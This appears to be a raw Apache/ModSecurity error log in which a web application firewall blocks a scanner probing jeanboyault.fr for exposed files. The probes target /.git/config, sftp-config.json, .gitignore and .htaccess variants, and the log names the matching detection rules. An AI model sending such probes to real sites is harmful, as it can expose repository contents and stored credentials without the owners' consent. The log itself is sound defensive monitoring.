[Mon May 11 11:54:09.758707 2026] [security2:error] [pid 1256241:tid 1256257] [client 49.51.38.193:48286] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.tchatbooster.com"] [uri "/"] [unique_id "agGnQZkIEwRJMyDaV55O0gAAAUs"], referer: http://tchatbooster.fr
[Mon May 11 11:54:09.804606 2026] [:error] [pid 1254328:tid 1254345] [client 171.25.193.20:14688] File does not exist: /home/ofcrysta/public_html/index2.php
[Mon May 11 11:54:12.497956 2026] [security2:error] [pid 1256241:tid 1256265] [client 185.177.72.9:30614] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config._"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "jeanboyault.fr"] [uri "/.git/config._"] [unique_id "agGnRJkIEwRJMyDaV55O1AAAAVM"]
[Mon May 11 11:54:12.498463 2026] [security2:error] [pid 1256241:tid 1256265] [client 185.177.72.9:30614] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/.git/config._"] [unique_id "agGnRJkIEwRJMyDaV55O1AAAAVM"]
[Mon May 11 11:54:13.680911 2026] [security2:error] [pid 1256241:tid 1256265] [client 185.177.72.9:30614] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGnRJkIEwRJMyDaV55O1AAAAVM"]
[Mon May 11 11:54:13.708112 2026] [security2:error] [pid 1254133:tid 1254145] [client 185.177.72.9:64784] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config._"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.jeanboyault.fr"] [uri "/.git/config._"] [unique_id "agGnRRjZymfuKpjWXeh9ggAAAMk"]
[Mon May 11 11:54:13.708898 2026] [security2:error] [pid 1254133:tid 1254145] [client 185.177.72.9:64784] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.jeanboyault.fr"] [uri "/.git/config._"] [unique_id "agGnRRjZymfuKpjWXeh9ggAAAMk"]
[Mon May 11 11:54:14.969939 2026] [security2:error] [pid 1254133:tid 1254145] [client 185.177.72.9:64784] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGnRRjZymfuKpjWXeh9ggAAAMk"]
[Mon May 11 11:54:14.998032 2026] [security2:error] [pid 1254179:tid 1254195] [client 185.177.72.9:64800] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config.template"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "jeanboyault.fr"] [uri "/.git/config.template"] [unique_id "agGnRmS6k_SCYd1AVZquZAAAAQ4"]
[Mon May 11 11:54:14.998585 2026] [security2:error] [pid 1254179:tid 1254195] [client 185.177.72.9:64800] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/.git/config.template"] [unique_id "agGnRmS6k_SCYd1AVZquZAAAAQ4"]
[Mon May 11 11:54:16.201464 2026] [security2:error] [pid 1254179:tid 1254195] [client 185.177.72.9:64800] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGnRmS6k_SCYd1AVZquZAAAAQ4"]
[Mon May 11 11:54:16.228763 2026] [security2:error] [pid 1254179:tid 1254192] [client 185.177.72.9:64808] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config.template"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.jeanboyault.fr"] [uri "/.git/config.template"] [unique_id "agGnSGS6k_SCYd1AVZquZQAAAQs"]
[Mon May 11 11:54:16.229167 2026] [security2:error] [pid 1254179:tid 1254192] [client 185.177.72.9:64808] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.jeanboyault.fr"] [uri "/.git/config.template"] [unique_id "agGnSGS6k_SCYd1AVZquZQAAAQs"]
[Mon May 11 11:54:17.540566 2026] [security2:error] [pid 1254179:tid 1254192] [client 185.177.72.9:64808] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGnSGS6k_SCYd1AVZquZQAAAQs"]
[Mon May 11 11:54:17.565965 2026] [security2:error] [pid 1254212:tid 1254460] [client 185.177.72.9:64812] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/sftp-config.json.disabled"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "jeanboyault.fr"] [uri "/.git/sftp-config.json.disabled"] [unique_id "agGnSUYQeUtAPynIs6xYmQAAABg"]
[Mon May 11 11:54:17.566338 2026] [security2:error] [pid 1254212:tid 1254460] [client 185.177.72.9:64812] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/.git/sftp-config.json.disabled"] [unique_id "agGnSUYQeUtAPynIs6xYmQAAABg"]
[Mon May 11 11:54:18.740806 2026] [security2:error] [pid 1254212:tid 1254460] [client 185.177.72.9:64812] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGnSUYQeUtAPynIs6xYmQAAABg"]
[Mon May 11 11:54:18.788440 2026] [security2:error] [pid 1254212:tid 1254216] [client 185.177.72.9:64814] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/sftp-config.json.disabled"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.jeanboyault.fr"] [uri "/.git/sftp-config.json.disabled"] [unique_id "agGnSkYQeUtAPynIs6xYnAAAAAI"]
[Mon May 11 11:54:18.790952 2026] [security2:error] [pid 1254212:tid 1254216] [client 185.177.72.9:64814] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.jeanboyault.fr"] [uri "/.git/sftp-config.json.disabled"] [unique_id "agGnSkYQeUtAPynIs6xYnAAAAAI"]
[Mon May 11 11:54:20.033193 2026] [security2:error] [pid 1254212:tid 1254216] [client 185.177.72.9:64814] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGnSkYQeUtAPynIs6xYnAAAAAI"]
[Mon May 11 11:54:25.758149 2026] [security2:error] [pid 1256241:tid 1256261] [client 185.177.72.9:35698] ModSecurity: Warning. Matched phrase "/.gitignore" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.gitignore found within REQUEST_FILENAME: /.gitignore._"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "jeanboyault.fr"] [uri "/.gitignore._"] [unique_id "agGnUZkIEwRJMyDaV55O5QAAAU8"]
[Mon May 11 11:54:25.758775 2026] [security2:error] [pid 1256241:tid 1256261] [client 185.177.72.9:35698] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/.gitignore._"] [unique_id "agGnUZkIEwRJMyDaV55O5QAAAU8"]
[Mon May 11 11:54:26.918429 2026] [security2:error] [pid 1256241:tid 1256261] [client 185.177.72.9:35698] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGnUZkIEwRJMyDaV55O5QAAAU8"]
[Mon May 11 11:54:26.971853 2026] [security2:error] [pid 1254133:tid 1254160] [client 185.177.72.9:35710] ModSecurity: Warning. Matched phrase "/.gitignore" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.gitignore found within REQUEST_FILENAME: /.gitignore._"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.jeanboyault.fr"] [uri "/.gitignore._"] [unique_id "agGnUhjZymfuKpjWXeh9nAAAANg"]
[Mon May 11 11:54:26.975414 2026] [security2:error] [pid 1254133:tid 1254160] [client 185.177.72.9:35710] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.jeanboyault.fr"] [uri "/.gitignore._"] [unique_id "agGnUhjZymfuKpjWXeh9nAAAANg"]
[Mon May 11 11:54:28.192602 2026] [security2:error] [pid 1254133:tid 1254160] [client 185.177.72.9:35710] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGnUhjZymfuKpjWXeh9nAAAANg"]
[Mon May 11 11:54:28.216084 2026] [security2:error] [pid 1254179:tid 1254203] [client 185.177.72.9:35712] ModSecurity: Warning. Matched phrase "/.gitignore" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.gitignore found within REQUEST_FILENAME: /.gitignore.disabled"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "jeanboyault.fr"] [uri "/.gitignore.disabled"] [unique_id "agGnVGS6k_SCYd1AVZqugQAAARY"]
[Mon May 11 11:54:28.217638 2026] [security2:error] [pid 1254179:tid 1254203] [client 185.177.72.9:35712] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/.gitignore.disabled"] [unique_id "agGnVGS6k_SCYd1AVZqugQAAARY"]
[Mon May 11 11:54:29.365984 2026] [security2:error] [pid 1254179:tid 1254203] [client 185.177.72.9:35712] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGnVGS6k_SCYd1AVZqugQAAARY"]
[Mon May 11 11:54:29.391903 2026] [security2:error] [pid 1254212:tid 1254222] [client 185.177.72.9:35728] ModSecurity: Warning. Matched phrase "/.gitignore" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.gitignore found within REQUEST_FILENAME: /.gitignore.disabled"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.jeanboyault.fr"] [uri "/.gitignore.disabled"] [unique_id "agGnVUYQeUtAPynIs6xYqwAAAAg"]
[Mon May 11 11:54:29.392224 2026] [security2:error] [pid 1254212:tid 1254222] [client 185.177.72.9:35728] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.jeanboyault.fr"] [uri "/.gitignore.disabled"] [unique_id "agGnVUYQeUtAPynIs6xYqwAAAAg"]
[Mon May 11 11:54:30.605835 2026] [security2:error] [pid 1254212:tid 1254222] [client 185.177.72.9:35728] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGnVUYQeUtAPynIs6xYqwAAAAg"]
[Mon May 11 11:54:30.631151 2026] [security2:error] [pid 1254242:tid 1254269] [client 185.177.72.9:35732] ModSecurity: Warning. Matched phrase "/.gitignore" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.gitignore found within REQUEST_FILENAME: /.gitignore.draft"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "jeanboyault.fr"] [uri "/.gitignore.draft"] [unique_id "agGnVr4KNmD_mZ_vlf85IAAAAFg"]
[Mon May 11 11:54:30.631376 2026] [security2:error] [pid 1254242:tid 1254269] [client 185.177.72.9:35732] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/.gitignore.draft"] [unique_id "agGnVr4KNmD_mZ_vlf85IAAAAFg"]
[Mon May 11 11:54:31.816523 2026] [security2:error] [pid 1254242:tid 1254269] [client 185.177.72.9:35732] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGnVr4KNmD_mZ_vlf85IAAAAFg"]
[Mon May 11 11:54:31.842830 2026] [security2:error] [pid 1256241:tid 1256252] [client 185.177.72.9:35742] ModSecurity: Warning. Matched phrase "/.gitignore" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.gitignore found within REQUEST_FILENAME: /.gitignore.draft"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.jeanboyault.fr"] [uri "/.gitignore.draft"] [unique_id "agGnV5kIEwRJMyDaV55O6wAAAUY"]
[Mon May 11 11:54:31.843189 2026] [security2:error] [pid 1256241:tid 1256252] [client 185.177.72.9:35742] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.jeanboyault.fr"] [uri "/.gitignore.draft"] [unique_id "agGnV5kIEwRJMyDaV55O6wAAAUY"]
[Mon May 11 11:54:33.058789 2026] [security2:error] [pid 1256241:tid 1256252] [client 185.177.72.9:35742] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGnV5kIEwRJMyDaV55O6wAAAUY"]
[Mon May 11 11:54:33.086244 2026] [security2:error] [pid 1256241:tid 1256246] [client 185.177.72.9:35746] ModSecurity: Warning. Matched phrase ".htaccess" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: .htaccess found within REQUEST_FILENAME: /.htaccess.temp"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "jeanboyault.fr"] [uri "/.htaccess.temp"] [unique_id "agGnWZkIEwRJMyDaV55O7AAAAUA"]
